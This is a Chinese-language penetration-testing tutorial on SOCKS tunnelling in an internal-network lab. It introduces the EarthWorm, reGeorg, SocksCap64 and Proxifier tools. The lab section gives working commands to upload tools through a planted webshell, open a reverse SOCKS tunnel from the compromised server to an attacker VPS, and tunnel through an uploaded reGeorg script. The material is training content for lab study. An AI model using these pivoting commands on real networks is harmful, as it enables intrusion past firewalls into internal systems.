基于百香果内网安全沙盘的SOCKS学习·上篇

0x01 前言

      上周斗哥给大家介绍来“百香果”内网安全沙盘的构建，主要用于学习内网渗透的基础环境，那么内网渗透中最基础的就是内网通信隧道了，本期给大家带来内网通信隧道中SOCKS的学习。

0x02 SOCKS代理与工具介绍

一、常见网络场景

1. 服务器在内网，可以任意访问外部网络
2. 服务器在内网，可以访问外部网络，但服务器安装了防火墙来拒绝敏感端口的连接。
3. 服务器在内网，对外只开放了部分端口（例如80端口），且服务器不能访问外部网络。

二、SOCKS代理

1. SOCKS是一种代理服务，可以简单地将一端的系统连接另一端。SOCKS支持多种协议，包括HTTP、FTP等。
2. SOCKS分为SOCKS4和SOCKS5两种类型：
3. SOCKS4只支持TCP协议；
4. SOCKS5不仅支持TCP/UDP协议，还支持各种身份验证机制等，其标准端口为1080。
5. SOCKS能够与目标内网计算机进行通信，避免多次使用端口转发。
6. SOCKS代理可以理解为增强版的lcx。它在服务端监听一个服务端口，当有新的连接请求出现时，会先SOCKS协议中解析出目标的URL的目标端口，再执行lcx的具体功能。
7. SOCKS工具选择，尽量选择没有GUI界面且不需要安装其他依赖的工具。

三、EarthWorm 工具介绍

工具介绍：

EarthWorm（EW）是一款便携式的网络工具，具有SOCKS5服务架设和端口转发两大核心功能，可以在复杂的网络环境中实现网络穿透。 EW能够以正向、反向、多级级联等方式建立网络隧道。 EW工具包提供了多个可执行文件，以适用不同的操作系统。 EW的新版本为Termite。

工具常见命令：

EW共有六种命令格式，分别是ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran。 用于普通网络环境的正向连接命令是sscoksd。 用于反弹连接的命令是rcsocks、rssocks。 其他命令用于复杂网络环境的多级级联。

四、reGeorg 工具介绍

reGeorg主要功能是把内网服务器的端口通过HTTP/HTTPS隧道转发到本机，形成一个回路。 reGeorg可以使目标服务器在内网中（或者在设置了端口策略的情况下）连接内部开放端口。reGeorg利用WebShell建立一个SOCKS代理进行内网穿透，服务器必须支持ASPX、PHP、JSP中的一种。

https://github.com/sensepost/reGeorg。

工具原理

工具常见命令

$ reGeorgSocksProxy.py [-h] [-l] [-p] [-r] -u  [-v]

Socks server for reGeorg HTTP(s) tunneller

optional arguments:
-h, --help           show this help message and exit
-l , --listen-on     The default listening address
-p , --listen-port   The default listening port
-r , --read-buff     Local read buffer, max data to be sent per POST
-u , --url           The url containing the tunnel script
-v , --verbose       Verbose output[INFO|DEBUG]

用法示例：

$ python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp

该脚本为python 2代码，使用该脚本需要安装urllib3库。

https://github.com/urllib3/urllib3

当其他端口无法建立隧道时，比如控制的服务器除了web端口外不出网。

五、SocksCap64 工具介绍

SocksCap64是一款在Windows环境中相当好用的全局代理软件。SocksCap64可以使Windows应用程序通过SOCKS代理服务器来访问网络，而不需要对这些应用程序进行任何修改。即使是那些本身不支持SOCKS代理的应用程序，也可以通过SocksCap64实现代理访问。（有些情况下某些工具走代理无法启动，所以更推荐Proxifier!!）

六、Proxifier 工具介绍

Proxifier也是一款非常好用的全局代理软件。Proxifier提供了跨平台的端口转发和代理功能，适用于Windows、Linux、MacOS平台。

0x03 基本实验

基本实验目的为掌握工具的基本使用场景、配置和使用。

一、基本拓扑：

二、基本拓扑搭建

R1、R2、R3、FW3、FW5均为“百香果”内网沙场拓扑图设备，开启后，其中FW3需配置NAT端口，将内网10.10.13.110的80端口映射到66.28.7.2的80端口。

VPS根据实验自行选择Windows或者Kali均可，IP为66.28.6.110，虚拟网卡为仅主机VM6。

内网WEB 服务器为一台windows2003服务器（该服务器可自行替换），已被传了一个webshell，shell外网访问方式为：http://66.28.7.2/shell.php。

内网DATA服务器为一台windows2003服务器（该服务器可自行替换），该服务器无法访问公网环境，因此需要在FW3上配置ACL。

三、ew、SocksCap64和Proxifier基本实验

1. EW隧道通信建立 VPS：访问webshell并上传ew 工具

配置ew 反向代理监听：

ew -s rcsocks -l 1008 -e 888

webshell：ew -s rssocks -d 66.28.6.110 -e 888

2. 浏览器配置SOKCS通信

采用的火狐浏览的FoxyPorxy Standard插件

3. Goby 使用SOCKS扫描

4. SocksCap64 配置SOCKS通信

mstsc程序，该程序没有自带socks连接，所以需要借助SocksCap64代理软件来实现。

添加代理服务器：

添加测试地址：

找到mstsc.exe软件直接拖到SocksCap64代理软件。

右键选中，选择“在代理隧道中运行选中程序”

5. Proxifier 配置SOCKS通信

默认全局走代理

点击浏览选择一个程序如mstsc.exe

动作选择Proxy SOCKS5 127.0.0.1

此时， 360浏览器因为未添加到代理的程序中，所以走的是默认匹配规则：

mstsc.exe程序因为在第一条匹配规则里面，所以走的SOCKS代理路线。

四、reGeorg基本实验

VPS配置 使用该工具需要将tunnel脚本传到web目录上去。

python reGeorgSocksProxy.py -p 1080 -u http://66.28.7.2/tunnel.php

通过测试PHPStudy的环境都会报错：dll() Not supported in multithreaded Web servers。

所以上传tunnel.nosocket.php脚本。

python reGeorgSocksProxy.py -p 1080 -u http://66.28.7.2/tunnel.nosocket.php

建立成功后，后续隧道直接配置本地的SOCKS。

0x05 总结

     本期基于“百香果”内网沙场的SOCKS学习上篇就到这里了，下篇斗哥将以实战场景为模拟，在百香果内网沙盘上进行ew一级级联和二级级联场景和内网限制主动出网两个典型场景的演示，敬请期待。